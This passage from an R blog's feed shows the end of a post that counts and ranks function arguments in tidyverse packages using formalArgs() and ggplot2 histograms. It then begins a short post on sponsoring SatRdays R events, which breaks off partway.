&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;x&amp;#34; &amp;#34;...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can counter act this by wrapping the function in &lt;code&gt;args()&lt;/code&gt; first. This method now works for both primitives and non-primitives&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;add&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:magrittr&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;e1&amp;#34; &amp;#34;e2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;x&amp;#34; &amp;#34;...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To work out the number of these argument we simply wrap this expression in &lt;code&gt;length()&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="the-big-reveal"&gt;The big reveal&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(num_args))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2,292 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func num_args&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ggplot2 theme 93&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 ggplot2 guide_colorbar 28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 ggplot2 guide_colourbar 28&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 ggplot2 guide_legend 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 rstudioapi launcherSubmitJob 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 ggplot2 geom_dotplot 19&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 ggplot2 geom_boxplot 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 readr read_delim_chunked 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 readr read_delim 17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 readr spec_delim 17&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 2,282 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So it turns out that &lt;code&gt;theme()&lt;/code&gt; from {ggplot2} is king of the arguments, by a mile! The largest per package looks like this&lt;/p&gt;
&lt;img class="image-center" src="counting-arguments-1.jpg" style="width:550px; class:image-center"&gt;
&lt;hr&gt;
&lt;p&gt;We’re not done there! The 9 packages with the largest sum of arguments are&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;largest &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(package)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;largest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;rlang&amp;#34; &amp;#34;ggplot2&amp;#34; &amp;#34;dplyr&amp;#34; &amp;#34;purrr&amp;#34; &amp;#34;lubridate&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;dbplyr&amp;#34; &amp;#34;readr&amp;#34; &amp;#34;rstudioapi&amp;#34; &amp;#34;httr&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can plot a histogram, for each package, of the no. of arguments in each function like so..&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; largest) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; num_args)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(binwidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;steelblue&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="counting-arguments-2.jpg" style="width:550px; class:image-center"&gt;
&lt;hr&gt;
&lt;p&gt;We can go a step further and retrieve the argument names as well. To do this we use the same technique as before with the functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(arg, args, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(arg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 1,029 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## arg n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ... 785&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 x 698&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 data 169&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 .x 120&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 &amp;#34;&amp;#34; 102&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 n 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 .f 90&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 position 90&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 mapping 79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 na.rm 79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 1,019 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The most commonly used arguments in the tidyverse are &lt;code&gt;...&lt;/code&gt; and &lt;code&gt;x&lt;/code&gt; by some distance.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(arg, args, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(arg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(package, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 26 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # Groups: package [26]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package arg n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 ggplot2 data 103&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 purrr .x 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 dplyr x 83&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 rlang ... 64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 readr locale 44&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 lubridate ... 35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 stringr pattern 23&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 dbplyr x 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 httr ... 21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 tidyr ... 18&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # … with 16 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So you can see that &lt;code&gt;data&lt;/code&gt; is the most common argument within {ggplot2}, &lt;code&gt;.x&lt;/code&gt; is the most common argument within {purrr} and so on…&lt;/p&gt;
&lt;p&gt;That’s it for this blog post. Hope you’ve enjoyed!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sponsorship: SatRdays and useR Groups</title><link>https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/</link><pubDate>Thu, 05 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="satrdays"&gt;SatRdays&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://satrdays.org/" rel="external"&gt;SatRdays&lt;/a&gt; are great. Low cost R events, held around the world. What&amp;rsquo;s not to love!&lt;/p&gt;
&lt;p&gt;For the last year, we have been offering automatic sponsorship for all &lt;a href="https://satrdays.org" rel="external"&gt;SatRday&lt;/a&gt; events. All the organisers have to do is complete a quick &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;questionnaire&lt;/a&gt; and the money is sent on it&amp;rsquo;s way. So far we have sponsored seven events!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kampala2019.satrdays.org/" rel="external"&gt;Kampal 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2019.satrdays.org" rel="external"&gt;Newcastle 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nairobi2019.satrdays.org/" rel="external"&gt;Nairobi 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cardiff2019.satrdays.org" rel="external"&gt;Cardiff 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://berlin2019.satrdays.org/" rel="external"&gt;Berlin 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://abidjan2020.satrdays.org/" rel="external"&gt;Abidjan 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2020.satrdays.org" rel="external"&gt;Newcastle 2020&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
